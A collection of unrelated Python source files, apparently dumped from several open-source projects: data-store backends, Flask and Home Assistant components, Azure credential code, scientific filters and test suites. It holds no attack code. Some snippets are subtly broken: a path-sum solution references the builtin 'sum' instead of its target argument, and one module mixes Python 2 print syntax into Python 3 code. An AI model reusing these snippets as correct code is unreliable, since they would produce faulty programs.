logger = logging.getLogger(__name__)
class StoreBackend(metaclass=ABCMeta):
"""A store backend acts as a key-value store that can accept tuples as keys, to abstract away
reading and writing to a persistence layer.
In general a StoreBackend implementation must provide implementations of:
- _get
- _set
- list_keys
- _has_key
"""
IGNORED_FILES = [".ipynb_checkpoints"]
STORE_BACKEND_ID_KEY = (".ge_store_backend_id",)
STORE_BACKEND_ID_PREFIX = "store_backend_id = "
STORE_BACKEND_INVALID_CONFIGURATION_ID = "00000000-0000-0000-0000-00000000e003"
def __init__(
self,
fixed_length_key=False,
suppress_store_backend_id=False,
manually_initialize_store_backend_id: str = "",
store_name="no_store_name",
):
"""
Initialize a StoreBackend
Args:
fixed_length_key:
suppress_store_backend_id: skip construction of a StoreBackend.store_backend_id
manually_initialize_store_backend_id: UUID as a string to use if the store_backend_id is not already set
store_name: store name given in the DataContextConfig (via either in-code or yaml configuration)
"""
self._fixed_length_key = fixed_length_key
self._suppress_store_backend_id = suppress_store_backend_id
self._manually_initialize_store_backend_id = (
manually_initialize_store_backend_id
)
self._store_name = store_name
@property
def fixed_length_key(self):
return self._fixed_length_key
@property
def store_name(self):
return self._store_name
def _construct_store_backend_id(self, suppress_warning: bool = False) -> str:
"""
Create a store_backend_id if one does not exist, and return it if it exists
If a valid UUID store_backend_id is passed in param manually_initialize_store_backend_id
and there is not already an existing store_backend_id then the store_backend_id
from param manually_initialize_store_backend_id is used to create it.
Args:
suppress_warning: boolean flag for whether warnings are logged
Returns:
store_backend_id which is a UUID(version=4)
"""
if self._suppress_store_backend_id:
if not suppress_warning:
logger.warning(
f"You are attempting to access the store_backend_id of a store or store_backend named {self.store_name} that has been explicitly suppressed."
)
return
try:
try:
return self.get(key=self.STORE_BACKEND_ID_KEY).replace(
self.STORE_BACKEND_ID_PREFIX, ""
)
except InvalidKeyError:
store_id = (
self._manually_initialize_store_backend_id
if self._manually_initialize_store_backend_id
else str(uuid.uuid4())
)
self.set(
key=self.STORE_BACKEND_ID_KEY,
value=f"{self.STORE_BACKEND_ID_PREFIX}{store_id}",
)
return store_id
except Exception:
if not suppress_warning:
logger.warning(
f"Invalid store configuration: Please check the configuration of your {self.__class__.__name__} named {self.store_name}"
)
return self.STORE_BACKEND_INVALID_CONFIGURATION_ID
# NOTE: AJB20201130 This store_backend_id and store_backend_id_warnings_suppressed was implemented to remove multiple warnings in DataContext.__init__ but this can be done more cleanly by more carefully going thorugh initialization order in DataContext
@property
def store_backend_id(self):
return self._construct_store_backend_id(suppress_warning=False)
@property
def store_backend_id_warnings_suppressed(self):
return self._construct_store_backend_id(suppress_warning=True)
def get(self, key, **kwargs):
self._validate_key(key)
value = self._get(key, **kwargs)
return value
def set(self, key, value, **kwargs):
self._validate_key(key)
self._validate_value(value)
# Allow the implementing setter to return something (e.g. a path used for its key)
try:
return self._set(key, value, **kwargs)
except ValueError as e:
logger.debug(str(e))
raise StoreBackendError("ValueError while calling _set on store backend.")
def move(self, source_key, dest_key, **kwargs):
self._validate_key(source_key)
self._validate_key(dest_key)
return self._move(source_key, dest_key, **kwargs)
def has_key(self, key):
self._validate_key(key)
return self._has_key(key)
def get_url_for_key(self, key, protocol=None):
raise StoreError(
"Store backend of type {:s} does not have an implementation of get_url_for_key".format(
type(self).__name__
)
)
def _validate_key(self, key):
if isinstance(key, tuple):
for key_element in key:
if not isinstance(key_element, str):
raise TypeError(
"Elements within tuples passed as keys to {} must be instances of {}, not {}".format(
self.__class__.__name__,
str,
type(key_element),
)
)
else:
raise TypeError(
"Keys in {} must be instances of {}, not {}".format(
self.__class__.__name__,
tuple,
type(key),
)
)
def _validate_value(self, value):
pass
@abstractmethod
def _get(self, key):
raise NotImplementedError
@abstractmethod
def _set(self, key, value, **kwargs):
raise NotImplementedError
@abstractmethod
def _move(self, source_key, dest_key, **kwargs):
raise NotImplementedError
@abstractmethod
def list_keys(self, prefix=()):
raise NotImplementedError
@abstractmethod
def remove_key(self, key):
raise NotImplementedError
def _has_key(self, key):
raise NotImplementedError
def is_ignored_key(self, key):
for ignored in self.IGNORED_FILES:
if ignored in key:
return True
return False
class InMemoryStoreBackend(StoreBackend):
"""Uses an in-memory dictionary as a store backend."""
# noinspection PyUnusedLocal
def __init__(
self,
runtime_environment=None,
fixed_length_key=False,
suppress_store_backend_id=False,
manually_initialize_store_backend_id: str = "",
store_name=None,
):
super().__init__(
fixed_length_key=fixed_length_key,
suppress_store_backend_id=suppress_store_backend_id,
manually_initialize_store_backend_id=manually_initialize_store_backend_id,
store_name=store_name,
)
self._store = {}
# Initialize with store_backend_id if not part of an HTMLSiteStore
if not self._suppress_store_backend_id:
_ = self.store_backend_id
def _get(self, key):
try:
return self._store[key]
except KeyError as e:
raise InvalidKeyError(f"{str(e)}")
def _set(self, key, value, **kwargs):
self._store[key] = value
def _move(self, source_key, dest_key, **kwargs):
self._store[dest_key] = self._store[source_key]
self._store.pop(source_key)
def list_keys(self, prefix=()):
return [key for key in self._store.keys() if key[: len(prefix)] == prefix]
def _has_key(self, key):
return key in self._store
def remove_key(self, key):
del self._store[key]
|
import logging
import uuid
import psutil
from datetime import datetime
import os
from flask import signals
from pythonapm.metrics.gauge import Gauge
from pythonapm.metrics.histogram import Histogram
from pythonapm.surfacers import Surfacers
from pythonapm.surfacers.log import LogSurfacer
logger = logging.getLogger(__name__)
class PythonAPM(object):
"""
Instruments flask applications, exposes a number of configurable metrics.
"""
def __init__(self, app, surfacers=Surfacers(LogSurfacer(),)):
self.app = app
self.surfacers = surfacers
self.request_time = Histogram(
'pythonapm.http.request.time_microseconds',
surfacers=self.surfacers,
)
self.rss_diff = Gauge(
'pythonapm.http.request.rss.diff.bytes',
surfacers=self.surfacers,
)
self.request_data = {
'request_start_time': None,
'request_start_rss': None,
}
self.init_apm(app)
def init_apm(self, app):
self.register_signals(app)
app.after_request(self.decorate_response)
def register_signals(self, app):
signals.got_request_exception.connect(
self.handle_exception, sender=app, weak=False)
signals.request_started.connect(self.request_started, sender=app)
signals.request_finished.connect(self.request_finished, sender=app)
def decorate_response(self, response):
response.headers['dm03514/pythonapm'] = uuid.uuid4()
return response
def handle_exception(self, *args, **kwargs):
self.surfacers.flush()
def request_started(self, *args, **kwargs):
logger.debug('request_started')
self.surfacers.clear()
self.request_data['request_start_time'] = datetime.utcnow()
self.request_data['request_start_rss'] = \
psutil.Process(os.getpid()).memory_info().rss
def request_finished(self, *args, **kwargs):
logger.debug('request_finished')
self.observe_request_time()
self.set_request_rss_diff()
self.surfacers.flush()
def observe_request_time(self):
diff = datetime.utcnow() - self.request_data['request_start_time']
self.request_time.observe(diff.microseconds)
def set_request_rss_diff(self):
diff = psutil.Process(os.getpid()).memory_info().rss \
- self.request_data['request_start_rss']
self.rss_diff.set(diff)
|
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def hasPathSum(self, root: TreeNode, targetSum: int) -> bool:
if root is None:
return False
if root.left is None and root.right is None and root.val == targetSum:
return True
return self.hasPathSum(root.left, targetSum - root.val) or self.hasPathSum(
root.right, targetSum - root.val
)
class Solution:
def hasPathSum(self, root: TreeNode, targetSum: int) -> bool:
if not root:
return False
stack = [(root, sum - root.val)]
while stack:
node, curr_sum = stack.pop()
if not node.left and not node.right and curr_sum == 0:
return True
if node.left:
stack.append((node.left, curr_sum - node.left.val))
if node.right:
stack.append((node.right, curr_sum - node.right.val))
return False
|
from testcases import (
TestServerTestCase,
get_client
)
from django.core.management import call_command
class OrderByTestCase(TestServerTestCase):
def setUp(self):
self.start_test_server()
self.client = get_client()
call_command('loaddata', 'small_data.json')
def tearDown(self):
self.stop_test_server()
def test_order1(self):
for i in self.client.message.objects.order_by("-id")[0:30]:
self.assertTrue(i)
order1 = self.client.message.objects.all().order_by("-id")[0:30]
for i in order1:
self.assertTrue(i)
order2 = self.client.message.objects.all().order_by("-id")
for i, k in zip(order2.all(), order2):
self.assertTrue(i.id == k.id)
order3 = self.client.message.objects.order_by("-id")
for i, k in zip(order3.all(), order3):
self.assertTrue(i.id == k.id) |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
__author__ = "Thomas Kaulke"
__email__ = "kaulketh@gmail.com"
__maintainer__ = "Thomas Kaulke"
__status__ = "Production"
import datetime
from rpi_ws281x import *
from config import LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_BRIGHTNESS, \
LED_INVERT, LED_NIGHT_CUT_OFF, \
LED_MORNING_CUT_OFF, LED_DAY_BRIGHTNESS, \
LED_NIGHT_BRIGHTNESS
from logger import LOGGER
class Strip:
name = "LED Strip"
def __init__(self, count, pin, hz, dma, invert, brightness):
self.__logger = LOGGER
self.__count = count
self.__pin = pin
self.__hz = hz
self.__dma = dma
self.__invert = invert
self.__brightness = brightness
self.__logger.debug(f"Create {self}")
self.__strip = Adafruit_NeoPixel(self.__count, self.__pin, self.__hz,
self.__dma, self.__invert,
self.__brightness)
self.__logger.debug(f"Initialized: {self.__strip}")
self.__strip.begin()
def __repr__(self):
return (
f"{self.name}: "
f"COUNT:{self.__count}, "
f"PIN:{self.__pin}, "
f"FREQ:{self.__hz}, "
f"DMA:{self.__dma}, "
f"INVERT:{self.__invert}, "
f"BRIGHTN.:{self.__brightness}")
def get_strip(self):
return self.__strip
@classmethod
def setup(cls, s: Adafruit_NeoPixel):
"""
Low light during given period.
:param s: Adafruit_NeoPixel
:return: Datetime, Brightness
"""
now = datetime.datetime.now()
if LED_MORNING_CUT_OFF < int(now.hour) < LED_NIGHT_CUT_OFF:
s.setBrightness(LED_DAY_BRIGHTNESS)
else:
s.setBrightness(LED_NIGHT_BRIGHTNESS)
b = s.getBrightness()
return now, b
def set_brightness_depending_on_daytime(s: Adafruit_NeoPixel):
return Strip.setup(s)
STRIP = Strip(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT,
LED_BRIGHTNESS).get_strip()
if __name__ == '__main__':
pass
|
# -*- coding: utf-8 -*-
# (c) 2017 Andreas Motl <andreas@ip-tools.org>
import celery
from uspto.peds.client import UsptoPatentExaminationDataSystemClient
from uspto.util.tasks import GenericDownloadTask, AsynchronousDownloader
class UsptoPatentExaminationDataSystemDownloadTask(GenericDownloadTask):
name = 'uspto.peds.tasks.UsptoPatentExaminationDataSystemDownloadTask'
client_factory = UsptoPatentExaminationDataSystemClient
@celery.shared_task(bind=True, base=UsptoPatentExaminationDataSystemDownloadTask)
def download_task(self, query, options=None):
"""
https://celery.readthedocs.io/en/latest/userguide/tasks.html#basics
http://docs.celeryproject.org/en/latest/whatsnew-4.0.html#the-task-base-class-no-longer-automatically-register-tasks
"""
return self.process(query, options)
class UsptoPatentExaminationDataSystemDownloader(AsynchronousDownloader):
task_function = download_task
|
import argparse
import textwrap
from datetime import date
version = '1.0.11'
today = date.today()
class CustomHelpFormatter(argparse.HelpFormatter):
"""
This class changes the way the help output is displayed
"""
def _format_action_invocation(self, action):
# This removes metvar after short option
if not action.option_strings or action.nargs == 0:
return super()._format_action_invocation(action)
default = self._get_default_metavar_for_optional(action)
args_string = self._format_args(action, default)
return ', '.join(action.option_strings) + ' ' + args_string
def _split_lines(self, text, width):
# This adds 3 spaces before lines that wrap
lines = text.splitlines()
for i in range(0, len(lines)):
if i >= 1:
lines[i] = (3 * ' ') + lines[i]
return lines
class MyHelpFormatter(CustomHelpFormatter, argparse.RawTextHelpFormatter):
pass
def add_global_arguments(parser, optional, required, in_help, out_help, inp, pre_suf, out_dir):
"""
Function to add argparse arguments used in all scripts
input: argparse group class instance "optional"
argparse group class instance "required"
in_help = help message output for input
out_help = help message output for output
"""
# Required
if inp is True:
required.add_argument('-i', '--input', required=True, type=str, metavar='<in_dir>',
help=textwrap.dedent(f"""{in_help}"""))
# Optional
if out_dir is True:
today_date = today.strftime("%b.%d.%Y")
out_dir = f'{format(parser.prog).split(".")[0]}_out_{today_date}'
optional.add_argument('-o', '--output', default=out_dir, type=str, metavar='<out_dir>',
help=textwrap.dedent(f"""{out_help}
"""))
if pre_suf is True:
optional.add_argument('-p', '--prefix', metavar='<prefix>', type=str, default='',
help=textwrap.dedent("""\
Prefix of input files
Default: NONE
Example: path/to/input/prefix*"""))
optional.add_argument('-s', '--suffix', metavar='<suffix>', type=str, default='',
help=textwrap.dedent("""\
Suffix of input files.
Default: NONE
Example: path/to/input/*suffix
"""))
optional.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS,
help=textwrap.dedent("""\
Show this help message and exit.
"""))
def initialize_argparse(name: object, desc: object, usage: object) -> object:
"""
This function initialized argparse
"""
formatter = lambda prog: MyHelpFormatter(prog, max_help_position=100)
# noinspection PyTypeChecker
parser = argparse.ArgumentParser(prog=name,
description=desc,
usage=usage,
formatter_class=formatter,
add_help=False,
epilog=textwrap.dedent(f"""\
additional information:
Version: {version}
GitHub: https://github.com/TheBrownLab/PhyloFisher
Cite: doi:https://10.1371/journal.pbio.3001365
"""))
optional = parser._action_groups.pop()
required = parser.add_argument_group('required arguments')
return parser, optional, required
def get_args(parser, optional, required, pre_suf=True, inp_dir=True, out_dir=True,
in_help='Path to input directory'):
out_help = ('Path to user-defined output directory\n'
f'Default: ./{format(parser.prog).split(".")[0]}_out_<M.D.Y>')
add_global_arguments(parser, optional, required,
in_help=in_help, out_help=out_help, inp=inp_dir,
pre_suf=pre_suf, out_dir=out_dir)
parser._action_groups.append(optional)
return parser.parse_args()
|
import numpy as np
from scipy.signal import butter, lfilter, filtfilt, lfilter_zi
import copy
from P_extend import k_extend
def compare(A,B):
return np.sum(A-B)
def filter_highk(k,P_in,start,end):
P_out=copy.deepcopy(P_in)
# start = k where you want to start cross fad
# end = k where you want to end the cross fad
# filtering specific
k_start=start; k_end=end
id1=np.where( k > k_end)[0]
id2=np.where( k <= k_end)[0]
id3=np.where( k > k_start)[0]
#id4=np.where( k <= k_start)[0]
id4=np.where( (k > k_start) & ( k<= k_end))[0]
order=6; wn=.1
B,A=butter(order,wn, btype='low', analog=False)
theta=np.linspace(1,0,id4.size)
W_fad=theta - 1/2./np.pi*np.sin(2*np.pi*theta)
filt_pad=id3.size
# end filtering specific
def zero_phase(sig):
sig=np.pad(sig,(filt_pad,filt_pad), 'constant', constant_values=(0, 0))
#zi=lfilter_zi(B,A)
#x,_=lfilter(B,A,sig, zi=zi*sig[0])
x=lfilter(B,A,sig)
#y,_=lfilter(B,A,x,zi=zi*x[0])
y=lfilter(B,A,x[::-1])
y=y[::-1]
#return y
return y[filt_pad:id3.size+filt_pad]
P_smoothed=zero_phase(P_out[id3])
P_patch=P_out[id4]*W_fad
P_out[id3]=P_smoothed
P_out[id4]=P_patch+(1-W_fad)*P_out[id4]
return P_out
def filter_lowk(k,P_in,start,end):
P_out=copy.deepcopy(P_in)
# start = k where you want to start cross fad
# end = k where you want to end the cross fad
# filtering specific
k_start=start; k_end=end
id1=np.where( k > k_end)[0]
id2=np.where( k <= k_end)[0]
id3=np.where( k < end)[0]
id4=np.where( (k > k_start) & ( k<= k_end))[0]
order=6; wn=.1
B,A=butter(order,wn, btype='low', analog=False)
theta=np.linspace(1,0,id4.size)
theta=theta[::-1]
W_fad=theta - 1/2./np.pi*np.sin(2*np.pi*theta)
filt_pad=id3.size
# end filtering specific
def zero_phase(sig):
sig=np.pad(sig,(filt_pad,filt_pad), 'constant', constant_values=(0, 0))
#zi=lfilter_zi(B,A)
#x,_=lfilter(B,A,sig, zi=zi*sig[0])
x=lfilter(B,A,sig)
#y,_=lfilter(B,A,x,zi=zi*x[0])
y=lfilter(B,A,x[::-1])
y=y[::-1]
#return y
return y[filt_pad:id3.size+filt_pad]
P_smoothed=zero_phase(P_out[id3])
P_patch=P_out[id4]*W_fad
P_out[id3]=P_smoothed
P_out[id4]=P_patch+(1-W_fad)*P_out[id4]
return P_out
def BW_filter(P_in,order=3,nf=.01):
print 'at butter, freq=', nf
B, A = butter(order, nf, 'low')
sig_ff = filtfilt(B, A, P_in, padlen=200)
return sig_ff
if __name__=="__main__":
d=np.loadtxt('Pk_Planck15.dat')
k=d[:,0]; P0=d[:,1]
import copy
test=copy.deepcopy(P0)
low_extrap=-4
high_extrap=5
EK=k_extend(k,low_extrap,high_extrap)
k=EK.extrap_k()
P0=EK.extrap_P_low(P0)
P0=EK.extrap_P_high(P0)
P1=filter_highk(k,P0,1,5)
P2=filter_lowk(k,P0,.01,.05)
k,P1=EK.PK_orginal(P1)
k,P2=EK.PK_orginal(P2)
k,P0=EK.PK_orginal(P0)
import matplotlib.pyplot as plt
ax=plt.subplot(141)
ax.set_xscale('log')
#ax.set_ylim(.99,1.01)
ax.set_yscale('log')
#P3=BW_filter(P0)
ax.plot(k[:-2],np.absolute(np.diff(P0,2)), label='orginal')
ax.plot(k[:-2],np.absolute(np.diff(P1,2)), '--', label='high filtered')
plt.grid()
plt.legend()
ax=plt.subplot(142)
ax.set_xscale('log')
ax.set_yscale('log')
P1=filter_highk(k,P0,1,5)
P2=filter_lowk(k,P0,.01,.05)
ax.plot(k[:-2],np.absolute(np.diff(P0,2)), label='orginal')
ax.plot(k[:-2],np.absolute(np.diff(P2,2)), '--', label='low filtered')
plt.grid()
plt.legend()
ax=plt.subplot(143)
ax.set_ylim(.99,1.01)
ax.set_xscale('log')
P1=filter_highk(k,P0,1,5)
P2=filter_lowk(k,P0,.01,.05)
ax.plot(k,P1/P0, label='high filtered')
ax.plot(k,P2/P0, '--', label='low filtered')
plt.grid()
plt.legend()
ax=plt.subplot(144)
ax.set_yscale('log')
ax.set_xscale('log')
P1=filter_highk(k,P0,1,5)
P2=filter_lowk(k,P0,.01,.05)
ax.plot(k,P0, label='original')
ax.plot(k,P1, label='high filtered')
ax.plot(k,P2, '--', label='low filtered')
plt.grid()
plt.legend()
plt.show() |
import sys
if __name__ == "__main__":
def plus_one(s):
ss = s.strip()
sp1 = str(1 + int(ss))
print(
"(+1) {} => {}".format(ss, sp1),
file=sys.stderr
)
return sp1
while True:
x = input()
if x:
print(plus_one(x))
|
from flask import Flask
import tensorflow as tf
import pandas as pd
import numpy as np
import os
import json
import sys
from tensorflow.keras.models import model_from_json
#path = os.path.join(sys.path[0], "log\DA_dnn_10-4.json")
#print(path)
# inputData = np.array([4,9,5,9.5,2.3,3.4,0,45])
def runDaylightPrediction(sideA,sideB,sideC,sideD,wWidth,wHeight,orient,area):
# Set current working directory
#cwd = '/content/drive/MyDrive/Daylight Autonomy'
#cwd = os.path.join(sys.path[0], "models/DA_CNN.json")
#print("working directory")
#print(cwd)
print(os.getcwd())
# Load CNN model
json_file = open('model/tensorflow_model/models/DA_CNN.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model_json)
print("loaded json")
loaded_model.load_weights('model/tensorflow_model/models/DA_CNN.h5')
# test case dictionary. Can be any list or array as long as the order is correct and is shaped to (1,8)
"""
test_case = {
'SideA': 4.7,
'SideB': 8.0,
'SideC': 6.0,
'SideD': 9.52,
'WindowWidth': 2.87,
'WindowLength': 1.25,
'Orientation': 45,
'Area': 45
}
"""
inputs = [sideA,sideB,sideC,sideD,wWidth,wHeight,orient,area]
# converting dictionary to 2D vector of size (1,8)
input_data = np.array(inputs).reshape(1,-1)
# predict input array, returns a 4D vector of size (1, 30, 31, 1)
test_pred = loaded_model.predict(input_data)
test_pred = test_pred.reshape(30,31)
test_pred = np.flipud(test_pred)
#test_pred = np.fliplr(test_pred)
# reshape to 1D vector for honeybee to recolor mesh
output = test_pred.ravel()
return list(output)
|
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import time
from msal.application import PublicClientApplication
from azure.core.credentials import AccessToken
from azure.core.exceptions import ClientAuthenticationError
from .. import CredentialUnavailableError
from .._constants import AZURE_CLI_CLIENT_ID
from .._internal import AadClient
from .._internal.decorators import log_get_token, wrap_exceptions
from .._internal.msal_client import MsalClient
from .._internal.shared_token_cache import NO_TOKEN, SharedTokenCacheBase
try:
from typing import TYPE_CHECKING
except ImportError:
TYPE_CHECKING = False
if TYPE_CHECKING:
# pylint:disable=unused-import,ungrouped-imports
from typing import Any, Optional
from .. import AuthenticationRecord
from .._internal import AadClientBase
class SharedTokenCacheCredential(SharedTokenCacheBase):
"""Authenticates using tokens in the local cache shared between Microsoft applications.
:param str username:
Username (typically an email address) of the user to authenticate as. This is used when the local cache
contains tokens for multiple identities.
:keyword str authority: Authority of an Azure Active Directory endpoint, for example 'login.microsoftonline.com',
the authority for Azure Public Cloud (which is the default). :class:`~azure.identity.AzureAuthorityHosts`
defines authorities for other clouds.
:keyword str tenant_id: an Azure Active Directory tenant ID. Used to select an account when the cache contains
tokens for multiple identities.
:keyword AuthenticationRecord authentication_record: an authentication record returned by a user credential such as
:class:`DeviceCodeCredential` or :class:`InteractiveBrowserCredential`
:keyword bool allow_unencrypted_cache: if True, the credential will fall back to a plaintext cache when encryption
is unavailable. Defaults to False.
"""
def __init__(self, username=None, **kwargs):
# type: (Optional[str], **Any) -> None
self._auth_record = kwargs.pop("authentication_record", None) # type: Optional[AuthenticationRecord]
if self._auth_record:
# authenticate in the tenant that produced the record unless "tenant_id" specifies another
self._tenant_id = kwargs.pop("tenant_id", None) or self._auth_record.tenant_id
self._cache = kwargs.pop("_cache", None)
self._app = None
self._client_kwargs = kwargs
self._initialized = False
else:
super(SharedTokenCacheCredential, self).__init__(username=username, **kwargs)
@log_get_token("SharedTokenCacheCredential")
def get_token(self, *scopes, **kwargs): # pylint:disable=unused-argument
# type (*str, **Any) -> AccessToken
"""Get an access token for `scopes` from the shared cache.
If no access token is cached, attempt to acquire one using a cached refresh token.
.. note:: This method is called by Azure SDK clients. It isn't intended for use in application code.
:param str scopes: desired scopes for the access token. This method requires at least one scope.
:rtype: :class:`azure.core.credentials.AccessToken`
:raises ~azure.identity.CredentialUnavailableError: the cache is unavailable or contains insufficient user
information
:raises ~azure.core.exceptions.ClientAuthenticationError: authentication failed. The error's ``message``
attribute gives a reason.
"""
if not scopes:
raise ValueError("'get_token' requires at least one scope")
if not self._initialized:
self._initialize()
if not self._cache:
raise CredentialUnavailableError(message="Shared token cache unavailable")
if self._auth_record:
return self._acquire_token_silent(*scopes)
account = self._get_account(self._username, self._tenant_id)
token = self._get_cached_access_token(scopes, account)
if token:
return token
# try each refresh token, returning the first access token acquired
for refresh_token in self._get_refresh_tokens(account):
token = self._client.obtain_token_by_refresh_token(scopes, refresh_token)
return token
raise CredentialUnavailableError(message=NO_TOKEN.format(account.get("username")))
def _get_auth_client(self, **kwargs):
# type: (**Any) -> AadClientBase
return AadClient(client_id=AZURE_CLI_CLIENT_ID, **kwargs)
def _initialize(self):
if self._initialized:
return
if not self._auth_record:
super(SharedTokenCacheCredential, self)._initialize()
return
self._load_cache()
if self._cache:
self._app = PublicClientApplication(
client_id=self._auth_record.client_id,
authority="https://{}/{}".format(self._auth_record.authority, self._tenant_id),
token_cache=self._cache,
http_client=MsalClient(**self._client_kwargs),
)
self._initialized = True
@wrap_exceptions
def _acquire_token_silent(self, *scopes, **kwargs):
# type: (*str, **Any) -> AccessToken
"""Silently acquire a token from MSAL. Requires an AuthenticationRecord."""
result = None
accounts_for_user = self._app.get_accounts(username=self._auth_record.username)
if not accounts_for_user:
raise CredentialUnavailableError("The cache contains no account matching the given AuthenticationRecord.")
for account in accounts_for_user:
if account.get("home_account_id") != self._auth_record.home_account_id:
continue
now = int(time.time())
result = self._app.acquire_token_silent_with_error(list(scopes), account=account, **kwargs)
if result and "access_token" in result and "expires_in" in result:
return AccessToken(result["access_token"], now + int(result["expires_in"]))
# if we get this far, the cache contained a matching account but MSAL failed to authenticate it silently
if result:
# cache contains a matching refresh token but STS returned an error response when MSAL tried to use it
message = "Token acquisition failed"
details = result.get("error_description") or result.get("error")
if details:
message += ": {}".format(details)
raise ClientAuthenticationError(message=message)
# cache doesn't contain a matching refresh (or access) token
raise CredentialUnavailableError(message=NO_TOKEN.format(self._auth_record.username))
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import torch
from torch import nn
from flash.core.optimizers import LAMB, LARS, LinearWarmupCosineAnnealingLR
@pytest.mark.parametrize(
"optim_fn, lr, kwargs",
[
(LARS, 0.1, {}),
(LARS, 0.1, {"weight_decay": 0.001}),
(LARS, 0.1, {"momentum": 0.9}),
(LAMB, 1e-3, {}),
(LAMB, 1e-3, {"amsgrad": True}),
(LAMB, 1e-3, {"weight_decay": 0.001}),
],
)
def test_optim_call(tmpdir, optim_fn, lr, kwargs):
layer = nn.Linear(10, 1)
optimizer = optim_fn(layer.parameters(), lr=lr, **kwargs)
for _ in range(10):
dummy_input = torch.rand(1, 10)
dummy_input.requires_grad = True
result = layer(dummy_input)
result.backward()
optimizer.step()
@pytest.mark.parametrize("optim_fn, lr", [(LARS, 0.1), (LAMB, 1e-3)])
def test_optim_with_scheduler(tmpdir, optim_fn, lr):
max_epochs = 10
layer = nn.Linear(10, 1)
optimizer = optim_fn(layer.parameters(), lr=lr)
scheduler = LinearWarmupCosineAnnealingLR(optimizer, warmup_epochs=2, max_epochs=max_epochs)
for _ in range(max_epochs):
dummy_input = torch.rand(1, 10)
dummy_input.requires_grad = True
result = layer(dummy_input)
result.backward()
optimizer.step()
scheduler.step()
|
from __future__ import annotations
from aiohttp import web, ClientSession
from homeassistant.core import HomeAssistant
from homeassistant.helpers.typing import ConfigType
from homeassistant.components.http import KEY_AUTHENTICATED, HomeAssistantView
import logging
_LOGGER = logging.getLogger(__name__)
DOMAIN = "imageproxy"
def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
hass.http.register_view(imageproxy(config['imageproxy']))
class imageproxy(HomeAssistantView):
url = "/imageproxy/{image}"
name = "api:imageproxy:image"
requires_auth = False
def __init__(self, config: ConfigType) -> None:
self.config = config
async def get(self, request: web.Request, image: str) -> web.StreamResponse:
if not request[KEY_AUTHENTICATED] and request.query.get("token") not in self.config['accesstokens']:
raise web.HTTPUnauthorized()
try:
async with ClientSession() as session:
async with session.get(self.config['resources'][image]) as resp:
return web.Response(body=await resp.content.read(), content_type=resp.content_type)
except Exception as e:
_LOGGER.error(e)
return web.Response(status=500) |
"""The mqtt_json component."""
|
# -*- coding: utf-8 -*-
class CCSDKException(Exception):
pass
class CCSDKInvalidParamException(CCSDKException):
pass
class CCServerException(CCSDKException):
pass
|
from abc import ABC
from pycurb.time_rule import TimeRule
from pycurb.utils import to_camelcase
class PyCurbObject(ABC):
fields = []
@classmethod
def from_dict(cls, d):
kwargs = {}
for a in cls.fields:
kwargs[a] = d.get(to_camelcase(a))
return cls(**kwargs)
def to_dict(self, sub_class):
d = {}
for f in sub_class.fields:
obj = self.__getattribute__(f)
if obj is not None:
ccf = to_camelcase(f)
if isinstance(obj, list):
d[ccf] = [
x.to_dict() if isinstance(x, (PyCurbObject,
TimeRule)) else x
for x in obj
]
else:
d[ccf] = obj.to_dict() if isinstance(
obj, (PyCurbObject, TimeRule)) else obj
return d
def add_list(self, name, list_attr):
if list_attr:
if isinstance(list_attr, (set, tuple)):
list_attr = list(list_attr)
if not isinstance(list_attr, list):
list_attr = [list_attr]
self.__setattr__(name, list_attr)
|
# CacheIntervals: Memoization with interval parameters
#
# Copyright (C) Cyril Godart
#
# This file is part of CacheIntervals.
#
# @author = 'Cyril Godart'
# @email = 'cyril.godart@gmail.com'
name = 'CacheIntervals'
import sys
sys.path.append('.')
from .MemoizationIntervals import MemoizationWithIntervals |
import logging
logging.basicConfig(
format='%(asctime)s %(levelname)-8s %(message)s',
level=logging.INFO,
datefmt='%Y-%m-%d %H:%M:%S')
|
# -*- encoding: UTF-8
from __future__ import unicode_literals
import os
import sys
import tempfile
import unittest
import zipfile
import six
from fs import zipfs
from fs.compress import write_zip
from fs.opener import open_fs
from fs.opener.errors import NotWriteable
from fs.test import FSTestCases
from fs.enums import Seek, ResourceType
from .test_archives import ArchiveTestCases
class TestWriteReadZipFS(unittest.TestCase):
def setUp(self):
fh, self._temp_path = tempfile.mkstemp()
def tearDown(self):
os.remove(self._temp_path)
def test_unicode_paths(self):
# https://github.com/PyFilesystem/pyfilesystem2/issues/135
with zipfs.ZipFS(self._temp_path, write=True) as zip_fs:
zip_fs.settext("Файл", "some content")
with zipfs.ZipFS(self._temp_path) as zip_fs:
paths = list(zip_fs.walk.files())
for path in paths:
self.assertIsInstance(path, six.text_type)
with zip_fs.openbin(path) as f:
f.read()
class TestWriteZipFS(FSTestCases, unittest.TestCase):
"""
Test ZIPFS implementation.
When writing, a ZipFS is essentially a TempFS.
"""
def make_fs(self):
_zip_file = tempfile.TemporaryFile()
fs = zipfs.ZipFS(_zip_file, write=True)
fs._zip_file = _zip_file
return fs
def destroy_fs(self, fs):
fs.close()
del fs._zip_file
class TestReadZipFS(ArchiveTestCases, unittest.TestCase):
"""
Test Reading zip files.
"""
def compress(self, fs):
fh, self._temp_path = tempfile.mkstemp()
os.close(fh)
write_zip(fs, self._temp_path)
def load_archive(self):
return zipfs.ZipFS(self._temp_path)
def remove_archive(self):
os.remove(self._temp_path)
def test_large(self):
test_fs = open_fs("mem://")
test_fs.setbytes("test.bin", b"a" * 50000)
write_zip(test_fs, self._temp_path)
self.fs = self.load_archive()
with self.fs.openbin("test.bin") as f:
self.assertEqual(f.read(), b"a" * 50000)
with self.fs.openbin("test.bin") as f:
self.assertEqual(f.read(50000), b"a" * 50000)
with self.fs.openbin("test.bin") as f:
